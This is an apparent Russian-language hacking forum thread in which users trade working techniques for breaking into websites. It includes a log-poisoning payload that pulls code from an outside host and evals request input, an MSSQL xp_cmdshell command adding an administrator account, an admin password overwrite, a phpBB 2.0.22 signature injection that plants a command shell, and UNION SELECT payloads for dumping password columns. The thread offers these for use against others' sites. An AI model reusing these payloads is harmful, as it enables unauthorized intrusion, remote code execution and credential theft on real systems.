Когда можно внедрить команды в запрос, и имеется file_priv (естественно кавычки не должны слешироваться) Обычно такой способ используется в слепых скулях.
LFI есть LFI, нашел еrror.log и access.log, access читать не получается т.к. размер большой, остался только еrror. Делаю запрос вида http://www.site.com/<? траляля ?> В лог пишется %3C? траляля ?%3E. Что же делать?)
[uri "/%3C?php%20file_get_contents('http://lala.com/%3C?php%20eval(stripslashes($_REQUEST[lol]));?%3E');?%3E"]
ну если ты это в адресную строку прямо все забил, то не удивительно. Ми тебе намекгул как бы, что запрос можно выполнить просто сторонним скриптом, или интекрякерами всякими, как тебе удобнее. PS: Выполнить запрос сторонним скриптом - это значит выполнить скрипт, а не набирать его код в адресной строке браузера
в mssql если имя пользователя не sa при запросе: http://test/news.asp?id=1+or+1=(select+system_user)-- то как я понимаю у меня не будет прав на выполнения команд?
2pinch нет от этого не зависеть если есть права то кмдшелл то добавь сам админа EXEC xp_cmdshell 'net localgroup Administrators test_user /add' в твоем случае можешь поменять пароль от админа (ну если превелегии есть) ?id=1; UPDATE 'admin_login' SET 'password' = 'password' WHERE login_name='sa--
Как в phpBB 2.0.22 обойти usercp_avatar.php ?? не получаеться залить шел через аватарку. видно стоит обработка скриптом! Или что можно воткнут в место phpinfo() в UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbbhpinfo()' WHERE user_id=4; штоб шел залить??
есть таблица users table_rows - 6 есть колонки name,pass когда делаю запрос union+select+......version()+from+users то все нормально а запрос union+select+......pass+from+users ничего не выдает что посоветуете?
Konqi проверь если не пустая табла union+select+1,2,count(*),4+from+users count(*) выводит количество записей в таблице, если вывело 0, таблица пустая либо для 5 ветки так union+select+1,table_rows+from+information_schema. tables+where+table_name='users' и если табла в нужной базe union+select+1,2,pass,4+from+database_name.users hex(unhex()) aes_encrypt.... GOGA075 concat обьеденяет запросы..причем тут конкатирование?
GOGA075 UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:assert(stripslashes($_REQUEST[cmd]));' WHERE user_id=2; then blablablabla......editprofile&cmd=phpinfo();
кароче там много баз.. и почти в каждой есть users.. первая запись (limit+0,1) пуста 1,1 все идет.. линк скинул в пм есле что.. вот так допустим можешь действовать на остальных Датабазах PHP: +union+select+group_concat(column_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns Where table_schema=0x63775F3631303334 AND table_name=0x77705F30317573657273-- PHP: +union+select+group_concat(column_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns Where table_schema=0x63775F36313033345F636F756E74696573 AND table_name=0x77705F7573657273--
